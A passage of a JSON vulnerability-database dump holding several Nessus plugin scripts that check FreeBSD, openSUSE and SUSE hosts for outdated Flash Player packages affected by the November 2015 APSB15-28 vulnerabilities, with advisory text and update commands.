11:49:44\");\n\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (547fbd98-8b1f-11e5-b48b-bcaec565249c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-7659).\n\nThese updates resolve a security bypass vulnerability that could be\nexploited to write arbitrary data to the file system under user\npermissions (CVE-2015-7662).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\nCVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\nCVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663,\nCVE-2015-8042, CVE-2015-8043, CVE-2015-8044, CVE-2015-8046).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-28.html\"\n );\n # https://vuxml.freebsd.org/freebsd/547fbd98-8b1f-11e5-b48b-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f68a4dc1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.548\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.548\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.548\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:00:49", "bulletinFamily": "scanner", "description": "The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2015-738.NASL", "href": "https://www.tenable.com/plugins/nessus/86880", "published": "2015-11-16T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2015-738)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-738.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86880);\n script_version(\"$Revision: 2.4 $\");\n script_cvs_date(\"$Date: 2015/12/12 18:38:05 $\");\n\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-738)\");\n script_summary(english:\"Check for the openSUSE-2015-738 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=954512\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.548-144.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.548-144.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.548-144.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.548-2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.548-2.79.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.548-2.79.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:18:19", "bulletinFamily": "scanner", "description": "The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-1960-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86867", "published": "2015-11-13T00:00:00", "title": "SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1960-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1960-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86867);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/09/11 11:22:12\");\n\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n\n script_name(english:\"SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1960-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=954512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7653/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7654/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7655/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7657/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7658/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7659/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7660/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7661/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7662/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7663/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8042/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8043/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8044/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8046/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151960-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ad2bdb7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-flash-player-12200=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-flash-player-12200=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"i386|i486|i586|i686|x86_64\") audit(AUDIT_ARCH_NOT, \"i386 / i486 / i586 / i686 / x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.548-0.26.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.548-0.26.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:18:19", "bulletinFamily": "scanner", "description": "The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-1958-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86866", "published": "2015-11-13T00:00:00", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1958-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1958-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86866);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/09/11 11:22:12\");\n\n script_cve_id(\"CVE-2015-7651\", \"CVE-2015-7652\", \"CVE-2015-7653\", \"CVE-2015-7654\", \"CVE-2015-7655\", \"CVE-2015-7656\", \"CVE-2015-7657\", \"CVE-2015-7658\", \"CVE-2015-7659\", \"CVE-2015-7660\", \"CVE-2015-7661\", \"CVE-2015-7662\", \"CVE-2015-7663\", \"CVE-2015-8042\", \"CVE-2015-8043\", \"CVE-2015-8044\", \"CVE-2015-8046\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1958-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The flash-player package was updated to fix the following security\nissues :\n\n - Security update to 11.2.202.548 (bsc#954512) :\n\n - APSB15-28, CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\n CVE-2015-7654, CVE-2015-7655, CVE-2015-7656,\n CVE-2015-7657, CVE-2015-7658, CVE-2015-7659,\n CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\n CVE-2015-7663, CVE-2015-8042, CVE-2015-8043,\n CVE-2015-8044, CVE-2015-8046\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=954512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7653/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7654/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7655/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7657/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7658/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7659/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7660/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7661/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7662/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7663/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8042/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8043/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8044/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8046/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151958-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8093985\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-824=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-824=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.548-111.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.548-111.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 